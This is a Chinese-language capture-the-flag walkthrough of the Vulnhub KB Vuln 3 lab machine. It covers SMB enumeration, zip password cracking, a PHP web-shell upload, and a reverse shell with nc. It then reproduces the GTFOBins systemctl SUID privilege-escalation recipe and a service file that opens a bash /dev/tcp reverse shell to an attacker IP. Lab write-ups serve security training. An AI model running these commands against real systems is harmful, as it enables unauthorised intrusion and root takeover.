Vulnhub之KB Vuln 3靶机详细测试过程

KB Vuln 3

作者：jason huawen
识别目标主机IP地址

1. ─(kali㉿kali)-[~/Vulnhub/KBVuln3]
2. └─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
3. Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                        
4.                                                                                                                            
5. 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
6. _____________________________________________________________________________
7.    IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
8. -----------------------------------------------------------------------------
9. 192.168.56.1    0a:00:27:00:00:06      1      60  Unknown vendor                                                           
10. 192.168.56.100  08:00:27:69:ef:ae      1      60  PCS Systemtechnik GmbH                                                   
11. 192.168.56.254  08:00:27:38:ea:a0      1      60  PCS Systemtechnik GmbH         

复制代码

利用Kali Linux的netdiscover工具识别目标主机IP地址为192.168.56.254
NMAP扫描

1. ┌──(kali㉿kali)-[~/Vulnhub/KBVuln3]
2. └─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
3. Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-11 19:35 EDT
4. Nmap scan report for bogon (192.168.56.254)
5. Host is up (0.00042s latency).
6. Not shown: 65531 closed tcp ports (reset)
7. PORT    STATE SERVICE     VERSION
8. 22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
9. | ssh-hostkey:
10. |   2048 cb04f0363f42f73ace2ff54ce0abfe17 (RSA)
11. |   256 6106df25d5e1e347fe1394fd740c8500 (ECDSA)
12. |_  256 5089b6b43a0b6e63121040e2c4f93533 (ED25519)
13. 80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
14. |_http-server-header: Apache/2.4.29 (Ubuntu)
15. |_http-title: Site doesn't have a title (text/html).
16. 139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
17. 445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
18. MAC Address: 08:00:27:38:EA:A0 (Oracle VirtualBox virtual NIC)
19. Service Info: Host: KB-SERVER; OS: Linux; CPE: cpe:/o:linux:linux_kernel
21. Host script results:
22. |_nbstat: NetBIOS name: KB-SERVER, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
23. | smb2-time:
24. |   date: 2023-04-11T23:35:58
25. |_  start_date: N/A
26. | smb2-security-mode:
27. |   311:
28. |_    Message signing enabled but not required
29. | smb-security-mode:
30. |   account_used: guest
31. |   authentication_level: user
32. |   challenge_response: supported
33. |_  message_signing: disabled (dangerous, but default)
34. | smb-os-discovery:
35. |   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
36. |   Computer name: kb-server
37. |   NetBIOS computer name: KB-SERVER\x00
38. |   Domain name: \x00
39. |   FQDN: kb-server
40. |_  System time: 2023-04-11T23:35:58+00:00
42. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
43. Nmap done: 1 IP address (1 host up) scanned in 15.75 seconds

复制代码

NMAP扫描结果表明目标主机有4个开放端口：22(ssh)、80（http)、139/445(samba)
获得Shell

1. ┌──(kali㉿kali)-[~/Vulnhub/KBVuln3]
2. └─$ smbclient -L 192.168.56.254                                
3. Password for [WORKGROUP\kali]:
4. Anonymous login successful
6.         Sharename       Type      Comment
7.         ---------       ----      -------
8.         Files           Disk      HACK ME
9.         IPC$            IPC       IPC Service (Samba 4.7.6-Ubuntu)
10. Reconnecting with SMB1 for workgroup listing.
11. Anonymous login successful
13.         Server               Comment
14.         ---------            -------
16.         Workgroup            Master
17.         ---------            -------
18.         WORKGROUP            KB-SERVER
19.                                                                                                                              
20. ┌──(kali㉿kali)-[~/Vulnhub/KBVuln3]
21. └─$ smbclient //192.168.56.254/Files        
22. Password for [WORKGROUP\kali]:
23. Anonymous login successful
24. Try "help" to get a list of possible commands.
25. smb: \> ls
26.   .                                   D        0  Fri Oct  2 14:11:49 2020
27.   ..                                  D        0  Fri Oct  2 13:12:00 2020
28.   website.zip                         N 38936127  Fri Oct  2 14:11:41 2020
30.                 14380040 blocks of size 1024. 9540188 blocks available
31. smb: \> get website.zip
32. getting file \website.zip of size 38936127 as website.zip (121094.1 KiloBytes/sec) (average 121094.1 KiloBytes/sec)
33. smb: \> pwd
34. Current directory is \\192.168.56.254\Files\
35. smb: \> cd /var
36. cd \var\: NT_STATUS_OBJECT_NAME_NOT_FOUND
37. smb: \> quit

复制代码

通过smbclient工具连接目标主机的smb服务，将共享目录中的文件下载到Kali Linux。

1. ─(kali㉿kali)-[~/Vulnhub/KBVuln3]
2. └─$ enum4linux 192.168.56.254
3. [+] Enumerating users using SID S-1-22-1 and logon username '', password ''                                                  
4.                                                                                                                              
5. S-1-22-1-1000 Unix User\heisenberg (Local User)         

复制代码

enum4linux工具识别出目标主机存在用户名heisenberg

1. ┌──(kali㉿kali)-[~/Vulnhub/KBVuln3]
2. └─$ ls -alh
3. total 38M
4. drwxr-xr-x  2 kali kali 4.0K Apr 11 19:38 .
5. drwxr-xr-x 89 kali kali 4.0K Apr 11 19:34 ..
6. -rw-r--r--  1 root root 1.8K Apr 11 19:35 nmap_full_scan
7. -rw-r--r--  1 kali kali  38M Apr 11 19:38 website.zip
8.                                                                                                                              
9. ┌──(kali㉿kali)-[~/Vulnhub/KBVuln3]
10. └─$ unzip website.zip
11. Archive:  website.zip
12. [website.zip] README.txt password:                                                                                                                              

复制代码

website.zip被加密，可以用ziptojohn转换为哈希值，然后利用John the ripper工具进行破解

1. ─$ zip2john website.zip > hashes        
2. └─$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes --force
3. Using default input encoding: UTF-8
4. Loaded 1 password hash (PKZIP [32/64])
5. Will run 2 OpenMP threads
6. Press 'q' or Ctrl-C to abort, almost any other key for status
7. porchman         (website.zip)     
8. 1g 0:00:00:00 DONE (2023-04-11 19:40) 1.886g/s 8617Kp/s 8617Kc/s 8617KC/s porno852..poppy670
9. Use the "--show" option to display all of the cracked passwords reliably
10. Session completed.

复制代码

1. ┌──(kali㉿kali)-[~/Vulnhub/KBVuln3]
2. └─$ cat README.txt     
3. Hi Heisenberg! Your website is activated. --> kb.vuln
4. Username  : admin
5. Password  : jesse
6. Have a good day !

复制代码

应该是网站的用户名密码，暂时放在一边。

1. ┌──(kali㉿kali)-[~/Vulnhub/KBVuln3/sitemagic]
2. └─$ nikto -h http://192.168.56.254     
3. - Nikto v2.1.6
4. ---------------------------------------------------------------------------
5. + Target IP:          192.168.56.254
6. + Target Hostname:    192.168.56.254
7. + Target Port:        80
8. + Start Time:         2023-04-11 19:44:48 (GMT-4)
9. ---------------------------------------------------------------------------
10. + Server: Apache/2.4.29 (Ubuntu)
11. + The anti-clickjacking X-Frame-Options header is not present.
12. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
13. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
14. + No CGI Directories found (use '-C all' to force check all possible dirs)
15. + Server may leak inodes via ETags, header found with file /, inode: 2240, size: 5b0b40b8dd680, mtime: gzip
16. + Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
17. + Allowed HTTP Methods: HEAD, GET, POST, OPTIONS
18. + OSVDB-3233: /icons/README: Apache default file found.
19. + 7915 requests: 0 error(s) and 7 item(s) reported on remote host
20. + End Time:           2023-04-11 19:45:44 (GMT-4) (56 seconds)
21. ---------------------------------------------------------------------------
22. + 1 host(s) tested

复制代码

根据README.txt文件，是不是要将kb.vuln添加到/etc/hosts文件中？

1. ┌──(kali㉿kali)-[~/Vulnhub/KBVuln3/sitemagic]
2. └─$ sudo vim /etc/hosts                                       
3.                                                                                                                              
4. ┌──(kali㉿kali)-[~/Vulnhub/KBVuln3/sitemagic]
5. └─$ cat /etc/hosts            
6. 127.0.0.1       localhost
7. 127.0.1.1       kali
8. ::1             localhost ip6-localhost ip6-loopback
9. ff02::1         ip6-allnodes
10. ff02::2         ip6-allrouters
11. 192.168.56.254 kb.vuln

复制代码

刷新页面，此时返回的页面就不是page not found,其中有Login链接，尝试用前面的Readme.txt中的用户名密码登录，可以成功登录，接下来的目标是将shell.php上传，上传文件没有任何限制，但是文件放在什么位置呢？
从页面源代码：

1. div  ><img  title="/Sunrise2/People.jpg" src="https://www.cnblogs.com/files/images/Sunrise2/People.jpg" alt="/Sunrise2/People.jpg" width="545" height="270">

复制代码

可以猜测文件位置为：

1. files/images/

复制代码

需要将shell.php上传到images/backgrounds目录下，即可访问
http://kb.vuln/files/images/backgrounds/shell.php

1. ┌──(kali㉿kali)-[~/Vulnhub/KBVuln3/sitemagic]
2. └─$ sudo nc -nlvp 5555                                         
3. listening on [any] 5555 ...
4. connect to [192.168.56.206] from (UNKNOWN) [192.168.56.254] 38966
5. Linux kb-server 4.15.0-118-generic #119-Ubuntu SMP Tue Sep 8 12:30:01 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
6. 00:04:41 up 34 min,  0 users,  load average: 0.86, 0.42, 0.55
7. USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
8. uid=33(www-data) gid=33(www-data) groups=33(www-data)
9. /bin/sh: 0: can't access tty; job control turned off
10. $ which python
11. /usr/bin/python
12. $ python -c 'import pty;pty.spawn("/bin/bash")'
13. www-data@kb-server:/$ cd /home
14. cd /home
15. www-data@kb-server:/home$ ls -alh
16. ls -alh
17. total 12K
18. drwxr-xr-x  3 root       root       4.0K Oct  2  2020 .
19. drwxr-xr-x 24 root       root       4.0K Oct  2  2020 ..
20. drwxr-xr-x  4 heisenberg heisenberg 4.0K Oct  2  2020 heisenberg
21. www-data@kb-server:/home$ cd heisengerg
22. cd heisengerg
23. bash: cd: heisengerg: No such file or directory
24. www-data@kb-server:/home$ cd heisenberg
25. cd heisenberg
26. www-data@kb-server:/home/heisenberg$ ls -alh
27. ls -alh
28. total 32K
29. drwxr-xr-x 4 heisenberg heisenberg 4.0K Oct  2  2020 .
30. drwxr-xr-x 3 root       root       4.0K Oct  2  2020 ..
31. -rw-r--r-- 1 heisenberg heisenberg  220 Apr  4  2018 .bash_logout
32. -rw-r--r-- 1 heisenberg heisenberg 3.7K Apr  4  2018 .bashrc
33. drwx------ 2 heisenberg heisenberg 4.0K Oct  2  2020 .cache
34. drwx------ 3 heisenberg heisenberg 4.0K Oct  2  2020 .gnupg
35. -rw-r--r-- 1 heisenberg heisenberg  807 Apr  4  2018 .profile
36. -rw-r--r-- 1 heisenberg heisenberg    0 Oct  2  2020 .sudo_as_admin_successful
37. -rw-r--r-- 1 root       root         33 Oct  2  2020 user.txt
38. www-data@kb-server:/home/heisenberg$ cat user.txt
39. cat user.txt
40. 6346c6d19751f1a3195f1e4b4b609544
41. www-data@kb-server:/home/heisenberg$

复制代码

从而得到user flag
提权

1. www-data@kb-server:/var/www/html/sitemagic$ find / -perm -4000 -type f 2>/dev/null
2. <l/sitemagic$ find / -perm -4000 -type f 2>/dev/null
3. /usr/lib/snapd/snap-confine
4. /usr/lib/policykit-1/polkit-agent-helper-1
5. /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
6. /usr/lib/eject/dmcrypt-get-device
7. /usr/lib/openssh/ssh-keysign
8. /usr/lib/dbus-1.0/dbus-daemon-launch-helper
9. /usr/bin/at
10. /usr/bin/sudo
11. /usr/bin/newgrp
12. /usr/bin/newuidmap
13. /usr/bin/chfn
14. /usr/bin/pkexec
15. /usr/bin/gpasswd
16. /usr/bin/chsh
17. /usr/bin/newgidmap
18. /usr/bin/passwd
19. /usr/bin/traceroute6.iputils
20. /bin/systemctl
21. /bin/umount
22. /bin/su
23. /bin/mount
24. /bin/fusermount
25. /bin/ping

复制代码

可以利用systemctl的SUID位进行提权，参考GTFOBINS网站给出的参考步骤进行提权

1. sudo install -m =xs $(which systemctl) .
3. TF=$(mktemp).service
4. echo '[Service]
5. Type=oneshot
6. ExecStart=/bin/sh -c "id > /tmp/output"
7. [Install]
8. WantedBy=multi-user.target' > $TF
9. ./systemctl link $TF
10. ./systemctl enable --now $TF

复制代码

因此接下来编写一个service文件，Spawn一个新的反弹shell

1. ┌──(kali㉿kali)-[~/Vulnhub/KBVuln3]
2. └─$ cat shell.service   
3. [Service]
4. Type=oneshot
5. ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/192.168.56.206/6666 0>&1'
7. [Install]
8. WantedBy=multi-user.target

复制代码

将shell.service文件上传到目标主机/tmp目录

1. www-data@kb-server:/tmp$ wget http://192.168.56.206:8000/shell.service
2. wget http://192.168.56.206:8000/shell.service
3. --2023-04-12 00:31:31--  http://192.168.56.206:8000/shell.service
4. Connecting to 192.168.56.206:8000... connected.
5. HTTP request sent, awaiting response... 200 OK
6. Length: 132 [application/octet-stream]
7. Saving to: 'shell.service'
9. shell.service       100%[===================>]     132  --.-KB/s    in 0s      
11. 2023-04-12 00:31:31 (46.4 MB/s) - 'shell.service' saved [132/132]

复制代码

将shell.service 移动到网站目录

1. www-data@kb-server:/var/www/html/sitemagic$ mv /tmp/shell.service .
2. mv /tmp/shell.service .

复制代码

然后创建服务

1. www-data@kb-server:/var/www/html/sitemagic$ systemctl link /var/www/html/sitemagic/shell2.service

复制代码

启动服务

1. www-data@kb-server:/var/www/html/sitemagic$ systemctl start shell2.service

复制代码

[code][/code]
免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！